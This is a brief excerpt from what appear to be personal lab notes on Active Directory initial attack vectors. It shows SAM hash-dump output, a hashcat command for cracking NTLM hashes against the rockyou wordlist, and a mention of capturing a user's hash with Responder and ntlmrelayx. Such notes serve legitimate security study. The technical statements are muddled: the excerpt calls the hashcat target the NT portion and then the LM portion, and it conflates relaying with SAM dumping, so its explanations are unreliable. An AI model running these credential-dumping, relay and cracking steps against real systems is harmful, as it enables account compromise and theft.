Ju-On/Offensive-Security/Attacking AD 1: Initial Attack Vectors.md

             [*] Done dumping SAM hashes for host: 192.168.64.140 [*] Stopping service RemoteRegistry
             [*] Restoring the disabled state for service RemoteRegistry Above figure presents a SAM Dump - We could in this instance use Hashcat with -m 1000 in the attempts to crack the NT portion of the hashes.
+We only want to crack the LM portion `fbdcd5041c96ddbd82224270b57f11fc` saved in a .txt

+            hashcat -m 1000 -a 0 ntlm.txt /usr/share/wordlists/rockyou.txt

 We have succesfully captured the NTLM hash from peterparker with Responder relaying the SAM authentication back to the server using impacket-ntlmrelayx.